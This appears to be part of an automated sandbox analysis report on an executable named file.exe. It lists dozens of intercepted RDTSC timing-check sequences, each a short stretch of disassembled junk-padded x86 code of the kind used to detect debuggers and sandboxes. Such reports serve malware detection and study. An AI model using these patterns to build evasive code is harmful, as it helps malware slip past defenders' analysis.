                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626461 second address: 62649E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F96F95D6D66h 0x0000000c jmp 00007F96F95D6D70h 0x00000011 popad 0x00000012 jmp 00007F96F95D6D78h 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F96F95D6D66h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62649E second address: 6264A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62674C second address: 626754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626754 second address: 62676C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F96F934F1E8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d js 00007F96F934F1E8h 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62BD7A second address: 62BDCE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F96F95D6D7Fh 0x0000000c jmp 00007F96F95D6D79h 0x00000011 pushad 0x00000012 jmp 00007F96F95D6D77h 0x00000017 jmp 00007F96F95D6D75h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62BDCE second address: 62BDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jnc 00007F96F934F1E6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jg 00007F96F934F1E6h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62BDEB second address: 62BDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62BDF0 second address: 62BE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632FC8 second address: 632FF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Fh 0x00000007 jmp 00007F96F95D6D75h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6331B8 second address: 6331C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F96F934F1E6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633499 second address: 6334BF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F96F95D6D70h 0x00000010 pop edi 0x00000011 popad 0x00000012 jp 00007F96F95D6D7Bh 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6338B8 second address: 6338BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6338BE second address: 6338DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633BD1 second address: 633C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F96F934F1FDh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F96F934F1ECh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633F1E second address: 633F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632BAF second address: 632BEF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F96F934F1E6h 0x00000008 jmp 00007F96F934F1EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F96F934F1F5h 0x00000015 jmp 00007F96F934F1ECh 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632BEF second address: 632BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6373A7 second address: 6373C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EBh 0x00000007 jmp 00007F96F934F1EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6373C7 second address: 6373CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63979D second address: 6397DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F96F934F205h 0x0000000f jmp 00007F96F934F1F3h 0x00000014 jmp 00007F96F934F1ECh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6397DD second address: 6397E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6397E5 second address: 6397EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FC78 second address: 63FCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F96F95D6D71h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F96F95D6D71h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FCA5 second address: 63FCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FCAB second address: 63FCB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F95D6D66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F68F second address: 63F698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F698 second address: 63F69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F849 second address: 63F85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push esi 0x00000008 je 00007F96F934F1E6h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FB86 second address: 64FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F5B4 second address: 64F5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F5BA second address: 64F62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F96F95D6D75h 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F96F95D6D6Fh 0x00000015 jmp 00007F96F95D6D74h 0x0000001a pushad 0x0000001b jmp 00007F96F95D6D77h 0x00000020 js 00007F96F95D6D66h 0x00000026 jmp 00007F96F95D6D6Dh 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65184F second address: 651853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651853 second address: 651891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F96F95D6D7Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F96F95D6D66h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651891 second address: 651895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651895 second address: 6518AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F96F95D6D6Bh 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6519CB second address: 6519E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F96F934F1F3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65808D second address: 65809E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F96F95D6D66h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65809E second address: 6580AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F6A4 second address: 65F6B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96F95D6D66h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F6B3 second address: 65F6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F934F1EBh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F96F934F1E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6669F7 second address: 6669FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666D44 second address: 666D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666D4A second address: 666DB1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F95D6D66h 0x00000008 jmp 00007F96F95D6D6Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F96F95D6D77h 0x00000017 ja 00007F96F95D6D83h 0x0000001d jmp 00007F96F95D6D77h 0x00000022 jne 00007F96F95D6D66h 0x00000028 jmp 00007F96F95D6D6Ch 0x0000002d jc 00007F96F95D6D72h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B584 second address: 66B58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B58A second address: 66B59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jg 00007F96F95D6D66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B6FC second address: 66B729 instructions: 0x00000000 rdtsc 0x00000002 je 00007F96F934F1F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F96F934F1F1h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B729 second address: 66B72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B72D second address: 66B755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a jmp 00007F96F934F1F4h 0x0000000f pushad 0x00000010 popad 0x00000011 jbe 00007F96F934F1E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6740A9 second address: 6740B5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F95D6D6Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6740B5 second address: 6740D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F96F934F1F5h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676852 second address: 676858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676858 second address: 67685E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67685E second address: 676862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB41 second address: 67CB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB45 second address: 67CB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB49 second address: 67CB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB57 second address: 67CB5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E50E second address: 67E512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A02E second address: 67A034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A034 second address: 67A038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A645 second address: 68A64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A64B second address: 68A64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A64F second address: 68A660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96F95D6D6Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A4FC second address: 68A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A502 second address: 68A51E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F96F95D6D66h 0x00000009 jmp 00007F96F95D6D6Ch 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3D1 second address: 68D3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3D6 second address: 68D3DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D159 second address: 69D170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D564 second address: 69D56A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D56A second address: 69D57A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F96F934F1EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D81E second address: 69D823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D991 second address: 69D997 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DAE7 second address: 69DAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DAEB second address: 69DAF5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F934F1E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DAF5 second address: 69DB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96F95D6D71h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DB0C second address: 69DB11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DB11 second address: 69DB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DB17 second address: 69DB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F934F1ECh 0x00000009 jmp 00007F96F934F1F9h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0C99 second address: 6A0C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0C9E second address: 6A0CE3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dl, 00000000h 0x0000000c adc edx, 2D35E68Fh 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F96F934F1E8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D217Bh], edi 0x00000034 push F871A435h 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d pop esi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A400B second address: 6A401B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96F95D6D68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3BF7 second address: 6A3C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EEh 0x00000007 jmp 00007F96F934F1F7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF050D second address: 4CF0511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0511 second address: 4CF0517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0517 second address: 4CF0534 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d mov bx, si 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0534 second address: 4CF0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0538 second address: 4CF053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF053E second address: 4CF0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF060B second address: 4CF066C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F96F95D6D78h 0x00000008 xor ax, DB88h 0x0000000d jmp 00007F96F95D6D6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F96F95D6D78h 0x0000001b sub esi, 6587BDE8h 0x00000021 jmp 00007F96F95D6D6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF066C second address: 4CF0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0670 second address: 4CF0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0676 second address: 4CF0697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F96F934F1EDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0697 second address: 4CF06B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, DC42h 0x00000007 mov bx, 7A8Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F96F95D6D70h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06B9 second address: 4CF06BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
